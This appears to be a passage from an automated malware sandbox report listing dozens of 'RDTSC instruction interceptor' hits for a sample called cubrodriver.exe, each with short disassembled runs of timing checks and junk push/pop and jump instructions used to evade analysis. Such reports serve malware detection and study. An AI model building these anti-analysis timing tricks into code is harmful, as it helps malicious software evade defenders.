Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FCBFB second address: 5FCC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8CA2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6019B3 second address: 6019B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 601AE8 second address: 601AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 601AF0 second address: 601B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F01B4D45ED6h 0x0000000a popad 0x0000000b jg 00007F01B4D45F07h 0x00000011 jo 00007F01B4D45EDEh 0x00000017 jnc 00007F01B4D45ED6h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 601B13 second address: 601B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 601B17 second address: 601B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 60247E second address: 602482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 602482 second address: 6024C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F01B4D45EDEh 0x0000000f jmp 00007F01B4D45EDFh 0x00000014 push edi 0x00000015 ja 00007F01B4D45ED6h 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F01B4D45EDFh 0x00000025 push eax 0x00000026 pop eax 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 604D5E second address: 604D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F01B44E8C96h 0x0000000b jmp 00007F01B44E8CA1h 0x00000010 jg 00007F01B44E8C96h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F01B44E8C9Ah 0x00000020 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 60724F second address: 607255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 607255 second address: 60725F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F01B44E8C96h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6073F8 second address: 60742A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d ja 00007F01B4D45ED6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 popad 0x00000017 jo 00007F01B4D45EF0h 0x0000001d jmp 00007F01B4D45EDAh 0x00000022 pushad 0x00000023 ja 00007F01B4D45ED6h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6076FC second address: 607700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 607700 second address: 607713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F01B4D45EDAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 60C47C second address: 60C489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 60C489 second address: 60C493 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F01B4D45ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 60BC8D second address: 60BC93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 60BF31 second address: 60BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 611857 second address: 61185D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61185D second address: 611861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 610383 second address: 610395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F01B44E8C9Bh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 610395 second address: 61039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61039A second address: 6103A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6103A9 second address: 6103AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6108A5 second address: 6108B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F01B44E8C96h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6108B7 second address: 6108C5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9DC0 second address: 5B9DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9DC4 second address: 5B9DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 610BB8 second address: 610BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 610BC1 second address: 610BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C364 second address: 57C36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C36A second address: 57C371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C371 second address: 57C377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C377 second address: 57C37B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C37B second address: 57C385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C385 second address: 57C389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C389 second address: 57C3C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F01B44E8C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F01B44E8CA6h 0x00000015 jp 00007F01B44E8CA2h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57C3B7 second address: 57C3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F01B4D45ED6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61A42E second address: 61A438 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F01B44E8C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61A438 second address: 61A43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61AD5E second address: 61AD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA5h 0x00000007 js 00007F01B44E8C9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61B308 second address: 61B30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61B30C second address: 61B315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61B315 second address: 61B335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F01B4D45ED6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F01B4D45EE1h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61B630 second address: 61B647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F01B44E8C9Ch 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61B938 second address: 61B93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61BC09 second address: 61BC20 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F01B44E8C96h 0x00000008 jmp 00007F01B44E8C9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 61BC20 second address: 61BC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 582DD9 second address: 582DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 621F48 second address: 621F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 621181 second address: 62118B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6217DB second address: 621837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F01B4D45EE9h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F01B4D45EDAh 0x00000016 jmp 00007F01B4D45EDFh 0x0000001b jmp 00007F01B4D45EE5h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007F01B4D45ED6h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 62197C second address: 621982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 621982 second address: 6219B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F01B4D45EE2h 0x0000000b pushad 0x0000000c jns 00007F01B4D45ED6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F01B4D45ED6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6219B0 second address: 6219C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F01B44E8C96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6219C0 second address: 6219C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6219C8 second address: 6219CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 62E3C4 second address: 62E3D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 62E3D0 second address: 62E3F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA3h 0x00000007 ja 00007F01B44E8C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 62E3F0 second address: 62E3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 62CF68 second address: 62CF8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F01B44E8CA4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F01B44E8C96h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 62DB7C second address: 62DB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F01B4D45ED6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 632069 second address: 632090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F01B44E8C96h 0x0000000a popad 0x0000000b jne 00007F01B44E8C9Ch 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F01B44E8C96h 0x0000001b jc 00007F01B44E8C96h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 632090 second address: 632094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 638CAC second address: 638CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B44E8CA3h 0x00000008 jl 00007F01B44E8C96h 0x0000000e je 00007F01B44E8C96h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 jng 00007F01B44E8C96h 0x0000001e pop edx 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 push ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 pop ebx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b jno 00007F01B44E8C96h 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push edx 0x00000035 pop edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 638CF2 second address: 638CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 638720 second address: 638741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8C9Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F01B44E8C96h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 638A31 second address: 638A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 645729 second address: 645758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F01B44E8C96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F01B44E8C9Fh 0x00000015 jmp 00007F01B44E8CA0h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 645758 second address: 64575E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 64575E second address: 645768 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F01B44E8C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6487F3 second address: 6487F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6487F7 second address: 648804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 64EF76 second address: 64EF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F01B4D45ED6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 64EF80 second address: 64EF95 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F01B44E8C9Dh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 64EF95 second address: 64EF9F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F01B4D45EE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6571F2 second address: 657207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 658A7E second address: 658A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 658A82 second address: 658AA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F01B44E8C96h 0x00000011 jmp 00007F01B44E8CA2h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 658AA8 second address: 658AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F01B4D45ED6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 658AB4 second address: 658AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B63E second address: 65B644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B644 second address: 65B648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B648 second address: 65B69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F01B4D45ED6h 0x0000000f jmp 00007F01B4D45EDEh 0x00000014 jmp 00007F01B4D45EE4h 0x00000019 popad 0x0000001a popad 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F01B4D45EE6h 0x00000022 pushad 0x00000023 popad 0x00000024 jnc 00007F01B4D45ED6h 0x0000002a popad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B69F second address: 65B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B496 second address: 65B49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B49C second address: 65B4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
